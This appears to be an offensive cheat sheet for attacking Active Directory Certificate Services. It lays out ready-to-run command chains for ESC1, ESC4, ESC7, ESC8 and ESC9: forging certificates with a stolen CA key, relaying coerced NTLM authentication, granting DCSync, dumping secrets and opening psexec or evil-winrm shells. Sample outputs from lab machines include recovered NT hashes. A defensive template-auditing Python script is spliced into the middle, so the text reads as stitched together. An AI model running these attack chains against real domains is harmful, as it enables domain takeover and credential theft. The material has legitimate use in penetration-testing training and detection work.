Enum (From Linux)
# Password
certipy-ad find -u '<USER>' -p '<PASSWORD>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO
# NTLM
certipy-ad find -u '<USER>' -hashes '<HASH>' -target <TARGET> -text -stdout -vulnerable
Sample Output:
TO-DO
# Kerberos
certipy-ad find -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -k -target <TARGET> -text -stdout -vulnerable -dc-host <DC> -ns <DC_IP>
Sample Output:
TO-DO
# Password
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -M adcs
Sample Output:
TO-DO
# NTLM
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -M adcs
Sample Output:
TO-DO
Enum (From Windows)
# Check ADCS service
net start | findstr /i cert
Sample Output:
TO-DO
# Check env
certutil
Sample Output:
TO-DO
# List cert templates
certutil -catemplates
Sample Output:
TO-DO
# Get info of each template
.\Certify.exe enum-cas
Sample Output:
TO-DO
# Find vuln templates
.\Certify.exe enum-cas --filter-vulnerable --current-user
Sample Output:
TO-DO
# Import ADCSTemplate module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO
# List templates
get-adcstemplate | fl displayname
Sample Output:
TO-DO
Ref: ADCSTemplate
Request a Personal Information Exchange File (.pfx)
1. Request a pfx
certipy-ad req -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -ca <CA> -template User -target <DC> -pfx '<USER>.pfx'
Sample Output:
$ certipy-ad req -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -ca rebound-DC01-CA -template User -target dc01.rebound.htb -pfx oorend.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'oorend@rebound.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-7682'
[*] Saved certificate and private key to 'oorend.pfx'
2. Get NTLM Hash with pfx
sudo ntpdate -s <DC_IP> && certipy-ad auth -pfx '<USER>.pfx' -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO
1. Request a Certificate
.\Certify.exe request /ca:<CA> /template:User
Sample Output:
TO-DO
2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ---[SNIP]--- -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx
Sample Output:
TO-DO
3. Get NTLM Hash with pfx
.\rubeus.exe asktgt /user:'<USER>' /certificate:cert.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO
Administrator of CA
1. Backup CA Certificate and Private Key
# Password
certipy-ad ca -u '<USER>' -p '<PASSWORD>' -target <TARGET_DOMAIN> -backup
Sample Output:
certipy-ad ca -u 'cert_admin' -p 'P@ssw0rd123' -target MS01.example.com -backup
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: MS01.example.com.
[!] Use -debug to print a stacktrace
[*] Creating new service for backup operation
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Backing up original PFX/P12 to 'pfx.p12'
[*] Backed up original PFX/P12 to 'pfx.p12'
[*] Saving certificate and private key to 'CA.pfx'
[*] Wrote certificate and private key to 'CA.pfx'
[*] Cleaning up
2. Forge a Certificate
certipy-ad forge -ca-pfx CA.pfx -upn administrator@<DOMAIN> -subject 'CN=Administrator,CN=Users,DC=<EXAMPLE>,DC=<COM>'
Sample Output:
$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@example.com -subject 'CN=Administrator,CN=Users,DC=EXAMPLE,DC=COM'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Saving forged certificate and private key to 'administrator_forged.pfx'
[*] Wrote forged certificate and private key to 'administrator_forged.pfx'
3. Export '.crt' and '.key' from '.pfx'
# Export crt
certipy-ad cert -pfx 'administrator_forged.pfx' -nokey -out 'administrator_forged.crt'
Sample Output:
TO-DO
# Export key
certipy-ad cert -pfx 'administrator_forged.pfx' -nocert -out 'administrator_forged.key'
Sample Output:
TO-DO
4. Pass-the-Cert
python3 passthecert.py -action modify_user -crt administrator_forged.crt -key administrator_forged.key -target <TARGET_USER> -elevate -domain <DOMAIN> -dc-host <DC>
Sample Output:
$ python3 passthecert.py -action modify_user -crt administrator_forged.crt -key administrator_forged.key -target apple.seed -elevate -domain example.com -dc-host dc01.example.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Granted user 'apple.seed' DCSYNC rights!
5. Secrets Dump
impacket-secretsdump '<TARGET_USER>:<PASSWORD>@<DC>'
Sample Output:
TO-DO
ESC1: Enrollee-Supplied Subject for Client Authentication
Abuse #1: Add Smartcard Logon
1. Import Modules
. .\PowerView.ps1
Sample Output:
TO-DO
. .\ADCS.ps1
Sample Output:
TO-DO
2. Add Smartcard Logon
Get-SmartCardCertificate -Identity Administrator -TemplateName <VULN_TEMPLATE> -NoSmartCard -Verbose
Sample Output:
TO-DO
3. Get Cert_Thumbprint
Get-ChildItem cert:\currentuser\my -recurse
Sample Output:
TO-DO
4. Get NTLM hash
.\rubeus.exe asktgt /user:Administrator /certificate:<THUMBPRINT> /getcredentials /show /nowrap
Sample Output:
TO-DO
5. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DO
Ref: PoshADCS
Abuse #2: Set Alternative Name
1. Lookup SID
# Password
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' read
Sample Output:
TO-DO
# NTLM
certipy-ad account -u '<USER>@<DOMAIN>' -hashes '<HASH>' -target '<DC>' -dc-ip '<DC_IP>' -user '<TARGET_USER>' read
Sample Output:
$ certipy-ad account -u 'cert_admin@example.com' -hashes 'f87---[SNIP]---773' -target 'dc01.example.com' -dc-ip '10.10.10.10' -user 'administrator' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=example,DC=com
name : Administrator
objectSid : S-1-5-21-1---[SNIP]---7-500
sAMAccountName : Administrator
userAccountControl : 66048
whenCreated : 2024-11-16T00:01:41+00:00
whenChanged : 2025-07-14T11:03:29+00:00
2. Request Certificate for the Target User
# Password
certipy-ad req -u '<USER>' -p '<PASSWORD>' -target <TARGET> -upn <TARGET_USER>@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE> -key-size 4096 -sid <SID>
Sample Output:
TO-DO
# NTLM
certipy-ad req -u '<USER>' -hashes '<HASH>' -target <TARGET> -upn <TARGET_USER>@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE> -key-size 4096 -sid <SID>
Sample Output:
TO-DO
# Kerberos
certipy-ad req -u '<USER>' -p '<PASSWORD>' -k -target <TARGET> -upn <TARGET_USER>@<DOMAIN> -ca <CA> -template <VULN_TEMPLATE> -key-size 4096 -sid <SID>
Sample Output:
TO-DO
3. Get NTLM Hash
sudo ntpdate -s <DC_IP> && certipy-ad auth -pfx <TARGET_USER>.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO
4. Remote
evil-winrm -i <TARGET> -u <TARGET_USER> -H <HASH>
Sample Output:
TO-DO
1. Generate a Cert with Altname
.\Certify.exe request /ca:<CA> /template:<VULN_TEMPLATE> /altname:administrator
Sample Output:
TO-DO
2. Convert pem to pfx
# Copy -----BEGIN RSA PRIVATE KEY----- ---[SNIP]--- -----END CERTIFICATE----- to cert.pem
openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out administrator.pfx
Sample Output:
TO-DO
3. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO
4. Remote
# Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DO
Abuse #3: Set msPKI-Certificate-Name-Flag
1. Import ADCSTemplate Module
import-module .\ADCSTemplate.psm1
Sample Output:
TO-DO
2. Create Template with msPKI-Certificate-Name-Flag Modified
Export-ADCSTemplate -displayName <VULN_TEMPLATE> > template.json
Sample Output:
TO-DO
$template = cat template.json -raw | ConvertFrom-Json
Sample Output:
TO-DO
$template.'msPKI-Certificate-Name-Flag' = 0x1
Sample Output:
TO-DO
$template | ConvertTo-Json | Set-Content template_mod.json
Sample Output:
TO-DO
3. Create a New Certificate Template
New-ADCSTemplate -DisplayName 'vuln_esc1' -Publish -JSON (cat template_mod.json -raw)
Sample Output:
TO-DO
4. Allow the User to Enroll in the Certificate
# Set permissions on the new template to allow a specific user to enroll in the certificate
Set-ADCSTemplateACL -DisplayName 'vuln_esc1' -type allow -identity '<DOMAIN>\<USER>' -enroll
Sample Output:
TO-DO
5. Request a Cert with Altname
.\Certify.exe request /ca:<CA> /template:vuln_esc1 /altname:administrator
Sample Output:
TO-DO
6. Get NTLM Hash
.\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap
Sample Output:
TO-DO
7. Remote
impacket-psexec -hashes :<HASH> administrator@<DOMAIN> cmd.exe
Sample Output:
TO-DO
Ref: ADCSTemplate
ESC4: Template Hijacking
1. Modify Template to a Vulnerable State
# Password
certipy-ad template -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -template '<TEMPLATE>' -write-default-configuration -no-save
Sample Output:
TO-DO
# NTLM
certipy-ad template -u '<USER>@<DOMAIN>' -hashes '<HASH>' -template '<TEMPLATE>' -write-default-configuration -no-save
Sample Output:
$ certipy-ad template -u 'ca_svc@sequel.htb' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -write-default-configuration -no-save
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: SEQUEL.HTB.
[!] Use -debug to print a stacktrace
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Replacing:
[*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*] flags: 66104
[*] pKIDefaultKeySpec: 2
[*] pKIKeyUsage: b'\x86\x00'
[*] pKIMaxIssuingDepth: -1
[*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*] pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*] msPKI-Enrollment-Flag: 0
[*] msPKI-Private-Key-Flag: 16
[*] msPKI-Certificate-Name-Flag: 1
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'DunderMifflinAuthentication'? (y/N): y
[*] Successfully updated 'DunderMifflinAuthentication'
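The attribute dump above shows the template state that `-write-default-configuration` writes: `msPKI-Certificate-Name-Flag: 1` (enrollee supplies the subject), `msPKI-Enrollment-Flag: 0` (no manager approval) and a Client Authentication EKU, which is the ESC1 combination a defender should look for when reviewing templates. The following script is an added example, not part of Certipy or of this page, that decodes those raw attribute values (including the little-endian `pKIExpirationPeriod` bytes) into MS-CRTD flag names and reports which ESC1/ESC9 preconditions a template meets. The sample dictionary is constructed from the output above; enrollment ACLs and `msPKI-RA-Signature` are not in that dump, so the RA-signature count is assumed 0 when absent and enrollment rights must be checked separately.

```python
"""Decode certificate-template attributes as printed by `certipy-ad template`
and report the ESC1/ESC9 preconditions the template satisfies.

Added example for this page (not Certipy's own code). Flag and EKU names
follow MS-CRTD; the sample dict below is constructed from the ESC4 output
shown on this page.
"""
import struct

# msPKI-Certificate-Name-Flag bits (MS-CRTD 2.26)
NAME_FLAGS = {
    0x00000001: "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT",
    0x00010000: "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME",
    0x02000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_UPN",
    0x08000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_DNS",
    0x20000000: "CT_FLAG_SUBJECT_REQUIRE_EMAIL",
    0x40000000: "CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME",
    0x80000000: "CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH",
}

# msPKI-Enrollment-Flag bits (MS-CRTD 2.27)
ENROLLMENT_FLAGS = {
    0x00000001: "CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS",
    0x00000002: "CT_FLAG_PEND_ALL_REQUESTS",        # manager approval required
    0x00000008: "CT_FLAG_PUBLISH_TO_DS",
    0x00000020: "CT_FLAG_AUTO_ENROLLMENT",
    0x00000800: "CT_FLAG_ALLOW_ENROLL_ON_BEHALF_OF",
    0x00080000: "CT_FLAG_NO_SECURITY_EXTENSION",    # SID security extension omitted (ESC9)
}

# EKUs that let a certificate authenticate a domain principal
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}


def decode_bits(value: int, table: dict) -> list:
    """Return the names of the bits in `table` that are set in `value`, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def period_days(raw: bytes) -> float:
    """pKIExpirationPeriod is a negative little-endian int64 interval in 100 ns
    units (FILETIME style); convert it to days."""
    (ticks,) = struct.unpack("<q", raw)
    return -ticks / 864_000_000_000  # 100 ns ticks per day


def audit_template(attrs: dict) -> dict:
    """Summarise one template and list the ESC1/ESC9 preconditions it meets.

    Enrollment ACLs are not part of the attribute dump, so they are not checked
    here; msPKI-RA-Signature is assumed 0 when missing (assumption, see lead-in).
    """
    name_flags = decode_bits(attrs.get("msPKI-Certificate-Name-Flag", 0), NAME_FLAGS)
    enroll_flags = decode_bits(attrs.get("msPKI-Enrollment-Flag", 0), ENROLLMENT_FLAGS)
    ekus = attrs.get("pKIExtendedKeyUsage", []) + attrs.get("msPKI-Certificate-Application-Policy", [])
    auth_ekus = sorted({CLIENT_AUTH_EKUS[o] for o in ekus if o in CLIENT_AUTH_EKUS})

    supplies_subject = any(f.startswith("CT_FLAG_ENROLLEE_SUPPLIES") for f in name_flags)
    needs_approval = "CT_FLAG_PEND_ALL_REQUESTS" in enroll_flags
    needs_signature = attrs.get("msPKI-RA-Signature", 0) > 0

    findings = []
    if supplies_subject and auth_ekus and not needs_approval and not needs_signature:
        findings.append("ESC1: enrollee-supplied subject/SAN, client-auth EKU, no approval or RA signature")
    if "CT_FLAG_NO_SECURITY_EXTENSION" in enroll_flags:
        findings.append("ESC9: security extension disabled on template")

    return {
        "template": attrs.get("name", "<unknown>"),
        "validity_days": period_days(attrs["pKIExpirationPeriod"]) if "pKIExpirationPeriod" in attrs else None,
        "name_flags": name_flags,
        "enrollment_flags": enroll_flags,
        "client_auth_ekus": auth_ekus,
        "findings": findings,
    }


# Constructed from the `certipy-ad template ... -write-default-configuration`
# output on this page (DunderMifflinAuthentication after modification).
SAMPLE_TEMPLATE = {
    "name": "DunderMifflinAuthentication",
    "pKIExpirationPeriod": b"\x00@9\x87.\xe1\xfe\xff",
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "msPKI-Enrollment-Flag": 0,
    "msPKI-Private-Key-Flag": 16,
    "msPKI-Certificate-Name-Flag": 1,
    "msPKI-Certificate-Application-Policy": ["1.3.6.1.5.5.7.3.2"],
}

if __name__ == "__main__":
    for key, value in audit_template(SAMPLE_TEMPLATE).items():
        print(f"{key:>18}: {value}")
```

Running it on the sample decodes `pKIExpirationPeriod` to a 365-day validity and reports the ESC1 combination; setting bit `0x2` in `msPKI-Enrollment-Flag` (manager approval) makes the finding disappear, which is the usual remediation for templates that must keep an enrollee-supplied subject.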
2. Request a Certificate Using the Modified Template
# Password
certipy-ad req -username '<USER>' -p '<PASSWORD>' -template '<TEMPLATE>' -target <TARGET> -ca <CA> -upn administrator@<DOMAIN>
Sample Output:
TO-DO
# NTLM
certipy-ad req -username '<USER>' -hashes '<HASH>' -template '<TEMPLATE>' -target <TARGET> -ca <CA> -upn administrator@<DOMAIN>
Sample Output:
$ certipy-ad req -username 'ca_svc' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ca sequel-DC01-CA -upn administrator@sequel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: DC01.sequel.htb.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
3. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
$ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.129.255.195
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
4. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO
1. Import Module
. .\PowerView.ps1
Sample Output:
TO-DO
2. Modify Template to a Vulnerable State
Add-DomainObjectAcl -TargetIdentity <VULN_TEMPLATE> -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=<EXAMPLE>,DC=<COM>"
Sample Output:
TO-DO
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<EXAMPLE>,DC=<COM>" -Identity <VULN_TEMPLATE> -XOR @{'mspki-certificate-name-flag'=1} -Verbose
Sample Output:
TO-DO
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<EXAMPLE>,DC=<COM>" -Identity <VULN_TEMPLATE> -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
Sample Output:
TO-DO
3. Request a Certificate Using the Modified Template
.\Certify.exe request --ca <DOMAIN>\<CA> --template <VULN_TEMPLATE> --upn administrator@<DOMAIN>
Sample Output:
TO-DO
4. Get NTLM Hash
# Convert the base64 encoded cert
echo '<BASE64_CERT>' | base64 -d > administrator.pfx
Sample Output:
TO-DO
# Request a TGT
.\rubeus.exe asktgt /user:Administrator /certificate:<PFX_FILE> /ptt /nowrap /getcredentials
Sample Output:
TO-DO
ESC7: Dangerous Permissions on CA
1. Use ManageCA Privilege to Add Manage Certificates Permission
certipy-ad ca -ca <CA> -add-officer '<USER>' -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
# Check
certipy-ad find -dc-ip <DC> -ns <DC_IP> -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -vulnerable -stdout
Sample Output:
TO-DO
2. Enable SubCA Template [Optional]
certipy-ad ca -ca <CA> -enable-template 'SubCA' -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
3. Request a Cert Based on SubCA
# This request is expected to fail. Take note of the Request ID
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -template SubCA -upn administrator@<DOMAIN> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
4. Issue Request Using ManageCA and Manage Certificates Privilege
certipy-ad ca -ca <CA> -issue-request <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
5. Request a Certificate from CA on the Target Domain
certipy-ad req -ca <CA> -target <TARGET_DOMAIN> -retrieve <REQUEST_ID> -u '<USER>@<DOMAIN>' -p '<PASSWORD>'
Sample Output:
TO-DO
6. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO
7. Remote
evil-winrm -i <TARGET> -u administrator -H <HASH>
Sample Output:
TO-DO
ESC8: NTLM Relay to AD CS Web Enrollment
1. DNS Poisoning
# Password
bloodyAD -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k --host <DC> add dnsRecord '<DC_HOSTNAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <LOCAL_IP>
Sample Output:
TO-DO
# NTLM
bloodyAD -u '<USER>' -p ':<HASH>' -f rc4 -d <DOMAIN> --host <DC> add dnsRecord '<DC_HOSTNAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' <LOCAL_IP>
Sample Output:
$ bloodyAD -u 'apple.seed' -p ':be167---[REDACTED]---68017' -f rc4 -d example.com --host DC01.example.com add dnsRecord 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.149.102
2. Setup NTLM Relay
certipy-ad relay -target '<TARGET_URL>' -template DomainController
Sample Output:
$ certipy-ad relay -target 'http://DC02.example.com/certsrv/certfnsh.asp' -template DomainController
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Targeting http://DC02.example.com/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 127.0.0.1, attacking target http://DC02.example.com
[*] HTTP Request: GET http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Authenticating against http://DC02.example.com as EXAMPLE/DC01$ SUCCEED
[*] Requesting certificate for 'EXAMPLE\\DC01$' based on the template 'DomainController'
[*] HTTP Request: POST http://dc02.example.com/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 5
[*] Retrieving certificate for request ID: 5
[*] HTTP Request: GET http://dc02.example.com/certsrv/certnew.cer?ReqID=5 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC01.example.com'
[*] Certificate object SID is 'S-1-5-21-1202327606-3023051327-2528451343-1000'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
[*] Exiting...
3. Check Coerce Authentication Methods
nxc smb <DC> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k -M coerce_plus
Sample Output:
$ nxc smb DC01.example.com -u 'apple.seed' -H 'be167---[REDACTED]---68017' -d example.com -k -M coerce_plus
SMB DC01.example.com 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:example.com) (signing:True) (SMBv1:False)
SMB DC01.example.com 445 DC01 [+] example.com\apple.seed:be167---[REDACTED]---68017
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, DFSCoerce
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, PrinterBug
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, PrinterBug
COERCE_PLUS DC01.example.com 445 DC01 VULNERABLE, MSEven
4. Coerce Authentication
nxc smb <DC> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k -M coerce_plus -o LISTENER=<DC_HOSTNAME>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=<METHOD>
Sample Output:
$ nxc smb DC01.example.com -u 'apple.seed' -H 'be167---[REDACTED]---68017' -d example.com -M coerce_plus -o LISTENER=DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
SMB 10.10.149.101 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:example.com) (signing:True) (SMBv1:False)
SMB 10.10.149.101 445 DC01 [+] example.com\apple.seed:be167---[REDACTED]---68017
COERCE_PLUS 10.10.149.101 445 DC01 VULNERABLE, PetitPotam
COERCE_PLUS 10.10.149.101 445 DC01 Exploit Success, lsarpc\EfsRpcAddUsersToFile
5. Get NTLM Hash
certipy-ad auth -pfx <DC_HOSTNAME>.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
$ certipy-ad auth -pfx dc01.pfx -domain example.com -dc-ip 10.10.149.101
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC01.example.com'
[*] Security Extension SID: 'S-1-5-21-1202327606-3023051327-2528451343-1000'
[*] Using principal: 'dc01$@example.com'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc01.ccache'
[*] Wrote credential cache to 'dc01.ccache'
[*] Trying to retrieve NT hash for 'dc01$'
[*] Got hash for 'dc01$@example.com': aad3b435b51404eeaad3b435b51404ee:156dd---[REDACTED]---b077c
1. Setup
+-------------------------------------------------+
| 1. Join Domain |
| 2. Config DNS |
| 3. Config C:\Windows\System32\drivers\etc\hosts |
+-------------------------------------------------+
Sample Output:
TO-DO
2. Request a Ticket
.\rubeus.exe asktgt /user:'<USER>' /password:'<PASSWORD>' /enctype:AES256 /domain:'<DOMAIN>' /dc:'<DC>' /ptt /nowrap
Sample Output:
TO-DO
3. Check
klist
Sample Output:
TO-DO
4. RemoteKrbRelay
.\RemoteKrbRelay.exe -adcs -template DomainController -victim <VICTIM> -target <TARGET> -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
Sample Output:
TO-DO
5. Convert Base64 Encoded Cert to p12
cat cert_b64 | base64 -d > cert.p12
Sample Output:
TO-DO
6. Get NTLM Hash
certipy-ad auth -pfx cert.p12 -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DO
Ref: RemoteKrbRelay
ESC9: No Security Extension on Certificate Template
1. Modify Target User’s userPrincipalName (With GenericAll/GenericWrite)
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn Administrator
Sample Output:
TO-DO
# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn Administrator
Sample Output:
$ certipy-ad account update -username 'management_svc@CERTIFIED.HTB' -hashes a091c1832bcdd4677c28b5a6a1295584 -user CA_OPERATOR -upn Administrator
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
2. Request a Cert of Target User
# Password
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -password '<PASSWORD>' -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
TO-DO
# NTLM
certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -hashes <HASH> -ca <CA> -template <VULN_TEMPLATE>
Sample Output:
$ certipy-ad req -username 'CA_OPERATOR@CERTIFIED.HTB' -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
3. Change Back Target User’s userPrincipalName
# Password
certipy-ad account update -username '<USER>@<DOMAIN>' -password '<PASSWORD>' -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO
# NTLM
certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn '<TARGET_USER>@<DOMAIN>'
Sample Output:
$ certipy-ad account update -username 'management_svc@CERTIFIED.HTB' -hashes a091c1832bcdd4677c28b5a6a1295584 -user CA_OPERATOR -upn 'CA_OPERATOR@CERTIFIED.HTB'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_operator':
userPrincipalName : CA_OPERATOR@CERTIFIED.HTB
[*] Successfully updated 'ca_operator'
4. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
$ certipy-ad auth -pfx administrator.pfx -domain certified.htb -dc-ip 10.129.231.186
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
